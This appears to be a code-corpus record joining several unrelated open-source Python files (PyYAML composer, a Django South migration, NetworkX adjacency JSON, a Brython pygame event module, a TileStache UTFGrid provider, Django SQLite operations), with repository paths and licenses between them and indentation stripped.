anchor = event.anchor
if anchor is not None:
if anchor in self.anchors:
raise ComposerError("found duplicate anchor %r; first occurence"
% anchor.encode('utf-8'), self.anchors[anchor].start_mark,
"second occurence", event.start_mark)
self.descend_resolver(parent, index)
if self.check_event(ScalarEvent):
node = self.compose_scalar_node(anchor)
elif self.check_event(SequenceStartEvent):
node = self.compose_sequence_node(anchor)
elif self.check_event(MappingStartEvent):
node = self.compose_mapping_node(anchor)
self.ascend_resolver()
return node
def compose_scalar_node(self, anchor):
event = self.get_event()
tag = event.tag
if tag is None or tag == u'!':
tag = self.resolve(ScalarNode, event.value, event.implicit)
node = ScalarNode(tag, event.value,
event.start_mark, event.end_mark, style=event.style)
if anchor is not None:
self.anchors[anchor] = node
return node
def compose_sequence_node(self, anchor):
start_event = self.get_event()
tag = start_event.tag
if tag is None or tag == u'!':
tag = self.resolve(SequenceNode, None, start_event.implicit)
node = SequenceNode(tag, [],
start_event.start_mark, None,
flow_style=start_event.flow_style)
if anchor is not None:
self.anchors[anchor] = node
index = 0
while not self.check_event(SequenceEndEvent):
node.value.append(self.compose_node(node, index))
index += 1
end_event = self.get_event()
node.end_mark = end_event.end_mark
return node
def compose_mapping_node(self, anchor):
start_event = self.get_event()
tag = start_event.tag
if tag is None or tag == u'!':
tag = self.resolve(MappingNode, None, start_event.implicit)
node = MappingNode(tag, [],
start_event.start_mark, None,
flow_style=start_event.flow_style)
if anchor is not None:
self.anchors[anchor] = node
while not self.check_event(MappingEndEvent):
#key_event = self.peek_event()
item_key = self.compose_node(node, None)
#if item_key in node.value:
# raise ComposerError("while composing a mapping", start_event.start_mark,
# "found duplicate key", key_event.start_mark)
item_value = self.compose_node(node, item_key)
#node.value[item_key] = item_value
node.value.append((item_key, item_value))
end_event = self.get_event()
node.end_mark = end_event.end_mark
return node
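# Usage sketch (illustrative, not part of the original module): Composer is
# normally mixed into a Loader class together with a reader, scanner, parser
# and resolver; PyYAML exposes the composition step as yaml.compose():
#
#     import yaml
#     node = yaml.compose("a: [1, 2]")   # returns a MappingNode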
| apache-2.0 |
martinburchell/econsensus | django/econsensus/publicweb/migrations/0020_auto__add_field_feedback_author.py | 4 | 6315 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Feedback.author'
db.add_column('publicweb_feedback', 'author', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='publicweb_feedback_related', null=True, to=orm['auth.User']), keep_default=False)
def backwards(self, orm):
# Deleting field 'Feedback.author'
db.delete_column('publicweb_feedback', 'author_id')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'publicweb.decision': {
'Meta': {'object_name': 'Decision'},
'archived_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'author': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'publicweb_decision_related'", 'null': 'True', 'to': "orm['auth.User']"}),
'budget': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'created_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'deadline': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'decided_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'effective_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'excerpt': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'people': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'review_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'tags': ('tagging.fields.TagField', [], {'null': 'True'}),
'watchers': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'symmetrical': 'False', 'blank': 'True'})
},
'publicweb.feedback': {
'Meta': {'object_name': 'Feedback'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'publicweb_feedback_related'", 'null': 'True', 'to': "orm['auth.User']"}),
'decision': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['publicweb.Decision']"}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'rating': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'resolved': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
}
}
complete_apps = ['publicweb']
| gpl-3.0 |
ionanrozenfeld/networkx | networkx/readwrite/json_graph/adjacency.py | 17 | 4891 | # Copyright (C) 2011-2013 by
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# All rights reserved.
# BSD license.
from itertools import chain, count
import networkx as nx
__author__ = """Aric Hagberg <aric.hagberg@gmail.com>"""
__all__ = ['adjacency_data', 'adjacency_graph']
_attrs = dict(id='id', key='key')
def adjacency_data(G, attrs=_attrs):
"""Return data in adjacency format that is suitable for JSON serialization
and use in Javascript documents.
Parameters
----------
G : NetworkX graph
attrs : dict
A dictionary that contains two keys 'id' and 'key'. The corresponding
values provide the attribute names for storing NetworkX-internal graph
data. The values should be unique. Default value:
:samp:`dict(id='id', key='key')`.
If some user-defined graph data use these attribute names as data keys,
they may be silently dropped.
Returns
-------
data : dict
A dictionary with adjacency formatted data.
Raises
------
NetworkXError
If values in attrs are not unique.
Examples
--------
>>> from networkx.readwrite import json_graph
>>> G = nx.Graph([(1,2)])
>>> data = json_graph.adjacency_data(G)
To serialize with json
>>> import json
>>> s = json.dumps(data)
Notes
-----
Graph, node, and link attributes will be written when using this format
but attribute keys must be strings if you want to serialize the resulting
data with JSON.
The default value of attrs will be changed in a future release of NetworkX.
See Also
--------
adjacency_graph, node_link_data, tree_data
"""
multigraph = G.is_multigraph()
id_ = attrs['id']
# Allow 'key' to be omitted from attrs if the graph is not a multigraph.
key = None if not multigraph else attrs['key']
if id_ == key:
raise nx.NetworkXError('Attribute names are not unique.')
data = {}
data['directed'] = G.is_directed()
data['multigraph'] = multigraph
data['graph'] = list(G.graph.items())
data['nodes'] = []
data['adjacency'] = []
for n, nbrdict in G.adjacency():
data['nodes'].append(dict(chain(G.node[n].items(), [(id_, n)])))
adj = []
if multigraph:
for nbr, keys in nbrdict.items():
for k, d in keys.items():
adj.append(dict(chain(d.items(), [(id_, nbr), (key, k)])))
else:
for nbr, d in nbrdict.items():
adj.append(dict(chain(d.items(), [(id_, nbr)])))
data['adjacency'].append(adj)
return data
def adjacency_graph(data, directed=False, multigraph=True, attrs=_attrs):
"""Return graph from adjacency data format.
Parameters
----------
data : dict
Adjacency list formatted graph data
Returns
-------
G : NetworkX graph
A NetworkX graph object
directed : bool
If True, and direction not specified in data, return a directed graph.
multigraph : bool
If True, and multigraph not specified in data, return a multigraph.
attrs : dict
A dictionary that contains two keys 'id' and 'key'. The corresponding
values provide the attribute names for storing NetworkX-internal graph
data. The values should be unique. Default value:
:samp:`dict(id='id', key='key')`.
Examples
--------
>>> from networkx.readwrite import json_graph
>>> G = nx.Graph([(1,2)])
>>> data = json_graph.adjacency_data(G)
>>> H = json_graph.adjacency_graph(data)
Notes
-----
The default value of attrs will be changed in a future release of NetworkX.
See Also
--------
adjacency_data, node_link_data, tree_data
"""
multigraph = data.get('multigraph', multigraph)
directed = data.get('directed', directed)
if multigraph:
graph = nx.MultiGraph()
else:
graph = nx.Graph()
if directed:
graph = graph.to_directed()
id_ = attrs['id']
# Allow 'key' to be omitted from attrs if the graph is not a multigraph.
key = None if not multigraph else attrs['key']
graph.graph = dict(data.get('graph', []))
mapping = []
for d in data['nodes']:
node_data = d.copy()
node = node_data.pop(id_)
mapping.append(node)
graph.add_node(node, attr_dict=node_data)
for i, d in enumerate(data['adjacency']):
source = mapping[i]
for tdata in d:
target_data = tdata.copy()
target = target_data.pop(id_)
if not multigraph:
graph.add_edge(source, target, attr_dict=tdata)
else:
ky = target_data.pop(key, None)
graph.add_edge(source, target, key=ky, attr_dict=tdata)
return graph
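# Round-trip sketch (illustrative, not part of the module):
#
#     G = nx.Graph([(1, 2), (2, 3)])
#     H = adjacency_graph(adjacency_data(G))
#     assert sorted(H.edges()) == sorted(G.edges())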
| bsd-3-clause |
40223144/2015cdafinal | static/Brython3.1.0-20150301-090019/Lib/site-packages/pygame/event.py | 603 | 19086 | #!/usr/bin/env python
'''Pygame module for interacting with events and queues.
Pygame handles all its event messaging through an event queue. The routines
in this module help you manage that event queue. The input queue is heavily
dependent on the pygame display module. If the display has not been
initialized and a video mode not set, the event queue will not really work.
The queue is a regular queue of Event objects, and there are a variety of ways
to access the events it contains, from simply checking for the existence of
events to grabbing them directly off the stack.
All events have a type identifier. This event type is in between the values
of NOEVENT and NUMEVENTS. All user defined events can have the value of
USEREVENT or higher. It is recommended to make sure your event ids follow this
system.
To get the state of various input devices, you can forego the event queue
and access the input devices directly with their appropriate modules; mouse,
key, and joystick. If you use this method, remember that pygame requires some
form of communication with the system window manager and other parts of the
platform. To keep pygame in sync with the system, you will need to call
pygame.event.pump() to keep everything current. You'll want to call this
function usually once per game loop.
The event queue offers some simple filtering. This can help performance
slightly by blocking certain event types from the queue, use the
pygame.event.set_allowed() and pygame.event.set_blocked() to work with
this filtering. All events default to allowed.
Joysticks will not send any events until the device has been initialized.
An Event object contains an event type and a readonly set of member data.
The Event object contains no method functions, just member data. Event
objects are retrieved from the pygame event queue. You can create your
own new events with the pygame.event.Event() function.
Your program must take steps to keep the event queue from overflowing. If the
program is not clearing or getting all events off the queue at regular
intervals, it can overflow. When the queue overflows an exception is thrown.
All Event objects contain an event type identifier in the Event.type member.
You may also get full access to the Event's member data through the Event.dict
method. All other member lookups will be passed through to the Event's
dictionary values.
While debugging and experimenting, you can print the Event objects for a
quick display of its type and members. Events that come from the system
will have a guaranteed set of member items based on the type. Here is a
list of the Event members that are defined with each type.
QUIT
(none)
ACTIVEEVENT
gain, state
KEYDOWN
unicode, key, mod
KEYUP
key, mod
MOUSEMOTION
pos, rel, buttons
MOUSEBUTTONUP
pos, button
MOUSEBUTTONDOWN
pos, button
JOYAXISMOTION
joy, axis, value
JOYBALLMOTION
joy, ball, rel
JOYHATMOTION
joy, hat, value
JOYBUTTONUP
joy, button
JOYBUTTONDOWN
joy, button
VIDEORESIZE
size, w, h
VIDEOEXPOSE
(none)
USEREVENT
code
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
from copy import copy
from functools import reduce  # reduce is not a builtin under Python 3 / Brython
#from ctypes import * #brython
from SDL import *
import pygame.base
import pygame.locals
import pygame.display
def pump():
'''Internally process pygame event handlers.
For each frame of your game, you will need to make some sort of call to
the event queue. This ensures your program can internally interact with
the rest of the operating system. If you are not using other event
functions in your game, you should call pygame.event.pump() to allow
pygame to handle internal actions.
This function is not necessary if your program is consistently processing
events on the queue through the other pygame.event functions.
There are important things that must be dealt with internally in the event
queue. The main window may need to be repainted or respond to the system.
If you fail to make a call to the event queue for too long, the system may
decide your program has locked up.
'''
pygame.display._video_init_check()
SDL_PumpEvents()
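# Usage sketch (illustrative, not part of the original module): a minimal
# loop that keeps the queue serviced once per frame; draw_frame() is a
# hypothetical rendering function and a display mode is assumed to be set.
#
#     while running:
#         for event in pygame.event.get():
#             if event.type == pygame.locals.QUIT:
#                 running = False
#         draw_frame()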
def get(typelist=None):
'''Get events from the queue.
pygame.event.get(): return Eventlist
pygame.event.get(type): return Eventlist
pygame.event.get(typelist): return Eventlist
This will get all the messages and remove them from the queue. If a type
or sequence of types is given only those messages will be removed from the
queue.
If you are only taking specific events from the queue, be aware that the
queue could eventually fill up with the events you are not interested in.
:Parameters:
`typelist` : int or sequence of int
Event type or list of event types that can be returned.
:rtype: list of `Event`
'''
pygame.display._video_init_check()
if typelist is None:
mask = SDL_ALLEVENTS
else:
if hasattr(typelist, '__len__'):
mask = reduce(lambda a,b: a | SDL_EVENTMASK(b), typelist, 0)
else:
mask = int(typelist)
SDL_PumpEvents()
events = []
new_events = SDL_PeepEvents(1, SDL_GETEVENT, mask)
while new_events:
events.append(Event(0, sdl_event=new_events[0]))
new_events = SDL_PeepEvents(1, SDL_GETEVENT, mask)
return events
def poll():
'''Get a single event from the queue.
Returns a single event from the queue. If the event queue is empty an event
of type pygame.NOEVENT will be returned immediately. The returned event is
removed from the queue.
:rtype: Event
'''
pygame.display._video_init_check()
event = SDL_PollEventAndReturn()
if event:
return Event(0, sdl_event=event, keep_userdata=True)
else:
return Event(pygame.locals.NOEVENT)
def wait():
'''Wait for a single event from the queue.
Returns a single event from the queue. If the queue is empty this function
will wait until one is created. While the program is waiting it will sleep
in an idle state. This is important for programs that want to share the
system with other applications.
:rtype: Event
'''
pygame.display._video_init_check()
return Event(0, sdl_event=SDL_WaitEventAndReturn())
def peek(typelist=None):
'''Test if event types are waiting on the queue.
Returns true if there are any events of the given type waiting on the
queue. If a sequence of event types is passed, this will return True if
any of those events are on the queue.
:Parameters:
`typelist` : int or sequence of int
Event type or list of event types to look for.
:rtype: bool
'''
pygame.display._video_init_check()
if typelist is None:
mask = SDL_ALLEVENTS
else:
if hasattr(typelist, '__len__'):
mask = reduce(lambda a,b: a | SDL_EVENTMASK(b), typelist, 0)
else:
mask = SDL_EVENTMASK(int(typelist))
SDL_PumpEvents()
events = SDL_PeepEvents(1, SDL_PEEKEVENT, mask)
if typelist is None:
if events:
return Event(0, sdl_event=events[0], keep_userdata=True)
else:
return Event(pygame.locals.NOEVENT) # XXX deviation from pygame
return len(events) > 0
def clear(typelist=None):
'''Remove all events from the queue.
Remove all events or events of a specific type from the queue. This has the
same effect as `get` except nothing is returned. This can be slightly more
efficient when clearing a full event queue.
:Parameters:
`typelist` : int or sequence of int
Event type or list of event types to remove.
'''
pygame.display._video_init_check()
if typelist is None:
mask = SDL_ALLEVENTS
else:
if hasattr(typelist, '__len__'):
mask = reduce(lambda a,b: a | SDL_EVENTMASK(b), typelist, 0)
else:
mask = int(typelist)
SDL_PumpEvents()
new_events = SDL_PeepEvents(1, SDL_GETEVENT, mask)
while new_events:
new_events = SDL_PeepEvents(1, SDL_GETEVENT, mask)
_event_names = {
SDL_ACTIVEEVENT: 'ActiveEvent',
SDL_KEYDOWN: 'KeyDown',
SDL_KEYUP: 'KeyUp',
SDL_MOUSEMOTION: 'MouseMotion',
SDL_MOUSEBUTTONDOWN:'MouseButtonDown',
SDL_MOUSEBUTTONUP: 'MouseButtonUp',
SDL_JOYAXISMOTION: 'JoyAxisMotion',
SDL_JOYBALLMOTION: 'JoyBallMotion',
SDL_JOYHATMOTION: 'JoyHatMotion',
SDL_JOYBUTTONUP: 'JoyButtonUp',
SDL_JOYBUTTONDOWN: 'JoyButtonDown',
SDL_QUIT: 'Quit',
SDL_SYSWMEVENT: 'SysWMEvent',
SDL_VIDEORESIZE: 'VideoResize',
SDL_VIDEOEXPOSE: 'VideoExpose',
SDL_NOEVENT: 'NoEvent'
}
def event_name(event_type):
'''Get the string name from an event id.
Pygame uses integer ids to represent the event types. If you want to
report these types to the user they should be converted to strings. This
will return the simple name for an event type. The string is in the
CamelCase style.
:Parameters:
- `event_type`: int
:rtype: str
'''
if event_type >= SDL_USEREVENT and event_type < SDL_NUMEVENTS:
return 'UserEvent'
return _event_names.get(event_type, 'Unknown')
def set_blocked(typelist):
'''Control which events are allowed on the queue.
The given event types are not allowed to appear on the event queue. By
default all events can be placed on the queue. It is safe to disable an
event type multiple times.
If None is passed as the argument, this has the opposite effect and none of
the event types are allowed to be placed on the queue.
:note: events posted with `post` will not be blocked.
:Parameters:
`typelist` : int or sequence of int or None
Event type or list of event types to disallow.
'''
pygame.display._video_init_check()
if typelist is None:
SDL_EventState(SDL_ALLEVENTS, SDL_IGNORE)
elif hasattr(typelist, '__len__'):
for val in typelist:
SDL_EventState(val, SDL_IGNORE)
else:
SDL_EventState(typelist, SDL_IGNORE)
def set_allowed(typelist):
'''Control which events are allowed on the queue.
The given event types are allowed to appear on the event queue. By default
all events can be placed on the queue. It is safe to enable an event type
multiple times.
If None is passed as the argument, this has the opposite effect and all of
the event types are allowed to be placed on the queue.
:Parameters:
`typelist` : int or sequence of int or None
Event type or list of event types to disallow.
'''
pygame.display._video_init_check()
if typelist is None:
SDL_EventState(SDL_ALLEVENTS, SDL_ENABLE)
elif hasattr(typelist, '__len__'):
for val in typelist:
SDL_EventState(val, SDL_ENABLE)
else:
SDL_EventState(typelist, SDL_ENABLE)
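# Filtering sketch (illustrative): silence high-frequency mouse motion
# events while leaving everything else enabled, then re-enable them later.
#
#     pygame.event.set_blocked(pygame.locals.MOUSEMOTION)
#     ...
#     pygame.event.set_allowed(pygame.locals.MOUSEMOTION)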
def get_blocked(typelist):
'''Test if a type of event is blocked from the queue.
Returns true if the given event type is blocked from the queue.
:Parameters:
- `typelist`: int or sequence of int or None
:rtype: int
'''
pygame.display._video_init_check()
if typelist == None:
return SDL_EventState(SDL_ALLEVENTS, SDL_QUERY) == SDL_ENABLE
elif hasattr(typelist, '__len__'): # XXX undocumented behaviour
for val in typelist:
if SDL_EventState(val, SDL_QUERY) == SDL_ENABLE:
return True
return False
else:
return SDL_EventState(typelist, SDL_QUERY) == SDL_ENABLE
def set_grab(grab):
'''Control the sharing of input devices with other applications.
When your program runs in a windowed environment, it will share the mouse
and keyboard devices with other applications that have focus. If your
program sets the event grab to True, it will lock all input into your
program.
It is best to not always grab the input, since it prevents the user from
doing other things on their system.
:Parameters:
- `grab`: bool
'''
pygame.display._video_init_check()
if grab:
SDL_WM_GrabInput(SDL_GRAB_ON)
else:
SDL_WM_GrabInput(SDL_GRAB_OFF)
def get_grab():
'''Test if the program is sharing input devices.
Returns true when the input events are grabbed for this application. Use
`set_grab` to control this state.
:rtype: bool
'''
pygame.display._video_init_check()
return SDL_WM_GrabInput(SDL_GRAB_QUERY) == SDL_GRAB_ON
_USEROBJECT_CHECK1 = int(0xdeadbeef) # signed
_USEROBJECT_CHECK2 = 0xfeedf00d
_user_event_objects = {}
_user_event_nextid = 1
def post(event):
'''Place a new event on the queue.
This places a new event at the end of the event queue. These Events will
later be retrieved from the other queue functions.
This is usually used for placing pygame.USEREVENT events on the queue.
Although any type of event can be placed, if using the sytem event types
your program should be sure to create the standard attributes with
appropriate values.
:Parameters:
`event` : Event
Event to add to the queue.
'''
global _user_event_nextid
pygame.display._video_init_check()
sdl_event = SDL_Event(event.type)
sdl_event.user.code = _USEROBJECT_CHECK1
sdl_event.user.data1 = c_void_p(_USEROBJECT_CHECK2)
sdl_event.user.data2 = c_void_p(_user_event_nextid)
_user_event_objects[_user_event_nextid] = event
_user_event_nextid += 1
SDL_PushEvent(sdl_event)
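# Illustrative sketch (not part of the original module): posting a custom
# user event; the attribute names 'message' and 'count' are arbitrary. The
# payload is parked in _user_event_objects and recovered by Event() below
# when the event comes back off the SDL queue.
#
#     ev = Event(SDL_USEREVENT, message='tick', count=42)
#     post(ev)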
class Event:
def __init__(self, event_type, event_dict=None, sdl_event=None,
keep_userdata=False, **attributes):
'''Create a new event object.
Creates a new event with the given type. The event is created with the
given attributes and values. The attributes can come from a dictionary
argument, from keyword arguments, or both.
The given attributes will be readonly attributes on the new event
object itself. These are the only attributes on the Event object,
there are no methods attached to Event objects.
:Parameters:
`event_type` : int
Event type to create
`event_dict` : dict
Dictionary of attributes to assign.
`sdl_event` : `SDL_Event`
Construct a Pygame event from the given SDL_Event; used
internally.
`keep_userdata` : bool
Used internally.
`attributes` : additional keyword arguments
Additional attributes to assign to the event.
'''
if sdl_event:
uevent = cast(pointer(sdl_event), POINTER(SDL_UserEvent)).contents
if uevent.code == _USEROBJECT_CHECK1 and \
uevent.data1 == _USEROBJECT_CHECK2 and \
uevent.data2 in _user_event_objects:
# An event that was posted; grab dict from local store.
id = uevent.data2
for key, value in _user_event_objects[id].__dict__.items():
setattr(self, key, value)
# Free memory unless just peeking
if not keep_userdata:
del _user_event_objects[id]
else:
# Standard SDL event
self.type = sdl_event.type
if self.type == SDL_QUIT:
pass
elif self.type == SDL_ACTIVEEVENT:
self.gain = sdl_event.gain
self.state = sdl_event.state
elif self.type == SDL_KEYDOWN:
self.unicode = sdl_event.keysym.unicode
self.key = sdl_event.keysym.sym
self.mod = sdl_event.keysym.mod
elif self.type == SDL_KEYUP:
self.key = sdl_event.keysym.sym
self.mod = sdl_event.keysym.mod
elif self.type == SDL_MOUSEMOTION:
self.pos = (sdl_event.x, sdl_event.y)
self.rel = (sdl_event.xrel, sdl_event.yrel)
self.buttons = (sdl_event.state & SDL_BUTTON(1) != 0,
sdl_event.state & SDL_BUTTON(2) != 0,
sdl_event.state & SDL_BUTTON(3) != 0)
elif self.type in (SDL_MOUSEBUTTONDOWN, SDL_MOUSEBUTTONUP):
self.pos = (sdl_event.x, sdl_event.y)
self.button = sdl_event.button
elif self.type == SDL_JOYAXISMOTION:
self.joy = sdl_event.which
self.axis = sdl_event.axis
self.value = sdl_event.value / 32767.0
elif self.type == SDL_JOYBALLMOTION:
self.joy = sdl_event.which
self.ball = sdl_event.ball
self.rel = (sdl_event.xrel, sdl_event.yrel)
elif self.type == SDL_JOYHATMOTION:
self.joy = sdl_event.which
self.hat = sdl_event.hat
hx = hy = 0
if sdl_event.value & SDL_HAT_UP:
hy = 1
if sdl_event.value & SDL_HAT_DOWN:
hy = -1
if sdl_event.value & SDL_HAT_RIGHT:
hx = 1
if sdl_event.value & SDL_HAT_LEFT:
hx = -1
self.value = (hx, hy)
elif self.type in (SDL_JOYBUTTONUP, SDL_JOYBUTTONDOWN):
self.joy = sdl_event.which
self.button = sdl_event.button
elif self.type == SDL_VIDEORESIZE:
self.size = (sdl_event.w, sdl_event.h)
self.w = sdl_event.w
self.h = sdl_event.h
elif self.type == SDL_VIDEOEXPOSE:
pass
elif self.type == SDL_SYSWMEVENT:
pass ### XXX: not implemented
elif self.type >= SDL_USEREVENT and self.type < SDL_NUMEVENTS:
self.code = sdl_event.code
else:
# Create an event (not from event queue)
self.type = event_type
if event_dict:
for key, value in event_dict.items():
setattr(self, key, value)
for key, value in attributes.items():
setattr(self, key, value)
# Bizarre undocumented but used by some people.
self.dict = self.__dict__
def __repr__(self):
d = copy(self.__dict__)
del d['type']
return '<Event(%d-%s %r)>' % \
(self.type, event_name(self.type), d)
def __nonzero__(self):
return self.type != SDL_NOEVENT
EventType = Event
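# Illustrative sketch (not in the original source): constructing events
# directly; dict keys and keyword arguments both become attributes.
#
#     e = Event(SDL_KEYDOWN, {'key': 27}, mod=0)
#     e.key                        # -> 27
#     bool(Event(SDL_NOEVENT))     # -> False, via __nonzero__ above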
| gpl-3.0 |
kartta-labs/mapwarper | lib/tilestache/TileStache-1.51.5/TileStache/Goodies/Providers/UtfGridCompositeOverlap.py | 13 | 4055 | import json
import TileStache
from TileStache.Core import KnownUnknown
class Provider:
def __init__(self, layer, stack, layer_id=None, wrapper=None):
#Set up result storage
self.resultGrid = []
self.gridKeys = []
self.gridData = {}
self.layer = layer
self.stack = stack
self.layer_id = layer_id
self.wrapper = wrapper
self.curId = 0
def renderTile(self, width, height, srs, coord):
for l in self.stack:
self.addLayer(l, coord)
return SaveableResponse(self.writeResult())
def getTypeByExtension(self, extension):
""" Get mime-type and format by file extension.
This only accepts "json".
"""
if extension.lower() != 'json':
raise KnownUnknown('UtfGridCompositeOverlap only makes .json tiles, not "%s"' % extension)
return 'text/json', 'JSON'
def addLayer( self, layerDef, coord ):
layer = TileStache.getTile(self.layer.config.layers[layerDef['src']], coord, 'JSON')[1]
if layerDef['wrapper'] is None:
layer = json.loads(layer)
else:
# Strip "Wrapper(...)"
layer = json.loads(layer[(len(layerDef['wrapper'])+1):-1])
grid_size = len(layer['grid'])
# Init resultGrid based on given layers (if required)
if len(self.resultGrid) == 0:
for i in xrange(grid_size):
self.resultGrid.append([])
for j in xrange(grid_size):
self.resultGrid[i].append(-1)
layer_keys = layer['keys']
for y in xrange(grid_size):
line = layer['grid'][y]
for x in xrange(grid_size):
src_id = self.decodeId(line[x])
if layer_keys[src_id] == "":
continue
src_key = layer_keys[src_id]
# Add layer name attribute
if layerDef['layer_id'] != None and self.layer_id != None:
layer['data'][src_key][self.layer_id] = layerDef['layer_id']
if self.resultGrid[x][y] == -1:
cur_id = self.curId
self.curId += 1
cur_key = json.dumps(cur_id)
# Set key for current point.
self.resultGrid[x][y] = self.encodeId(cur_id)
self.gridKeys.insert(cur_id + 1, cur_key)
# Initialize data bucket.
self.gridData[cur_key] = []
else:
cur_id = self.decodeId(self.resultGrid[x][y])
cur_key = json.dumps(cur_id)
self.gridData[cur_key].append(layer['data'][src_key])
def writeResult( self ):
result = "{\"keys\": ["
for i in xrange(len(self.gridKeys)):
if i > 0:
result += ","
result += "\"" + self.gridKeys[i] + "\""
result += "], \"data\": { "
first = True
for key in self.gridData:
if not first:
result += ","
first = False
result += "\"" + key + "\": " + json.dumps(self.gridData[key]) + ""
result += "}, \"grid\": ["
grid_size = len(self.resultGrid)
first = True
for y in xrange(grid_size):
line = ""
for x in xrange(grid_size):
if self.resultGrid[x][y] == -1:
self.resultGrid[x][y] = ' '
line = line + self.resultGrid[x][y]
if not first:
result += ","
first = False
result += json.dumps(line)
if self.wrapper is None:
return result + "]}"
else:
return self.wrapper + "(" + result + "]})"
def encodeId ( self, id ):
id += 32
if id >= 34:
id = id + 1
if id >= 92:
id = id + 1
if id > 127:
return unichr(id)
return chr(id)
def decodeId( self, id ):
id = ord(id)
if id >= 93:
id = id - 1
if id >= 35:
id = id - 1
return id - 32
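# Worked example (illustrative, not in the original source) of the UTFGrid
# id encoding above: ids map to printable characters starting at 32 (space),
# skipping the double quote (34) and backslash (92) so the grid stays valid
# inside a JSON string.
#
#     encodeId(0)  -> ' '    decodeId(' ') -> 0
#     encodeId(1)  -> '!'    decodeId('!') -> 1
#     encodeId(2)  -> '#'    decodeId('#') -> 2    (the quote is skipped)
#     encodeId(60) -> '^'    decodeId('^') -> 60   (the backslash is skipped)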
class SaveableResponse:
""" Wrapper class for JSON response that makes it behave like a PIL.Image object.
TileStache.getTile() expects to be able to save one of these to a buffer.
"""
def __init__(self, content):
self.content = content
def save(self, out, format):
if format != 'JSON':
raise KnownUnknown('UtfGridCompositeOverlap only saves .json tiles, not "%s"' % format)
out.write(self.content)
| mit |
JorgeCoock/django | django/db/backends/sqlite3/operations.py | 180 | 9372 | from __future__ import unicode_literals
import datetime
import uuid
from django.conf import settings
from django.core.exceptions import FieldError, ImproperlyConfigured
from django.db import utils
from django.db.backends import utils as backend_utils
from django.db.backends.base.operations import BaseDatabaseOperations
from django.db.models import aggregates, fields
from django.utils import six, timezone
from django.utils.dateparse import parse_date, parse_datetime, parse_time
from django.utils.duration import duration_string
try:
import pytz
except ImportError:
pytz = None
class DatabaseOperations(BaseDatabaseOperations):
def bulk_batch_size(self, fields, objs):
"""
SQLite has a compile-time default (SQLITE_LIMIT_VARIABLE_NUMBER) of
999 variables per query.
If there is just single field to insert, then we can hit another
limit, SQLITE_MAX_COMPOUND_SELECT which defaults to 500.
"""
limit = 999 if len(fields) > 1 else 500
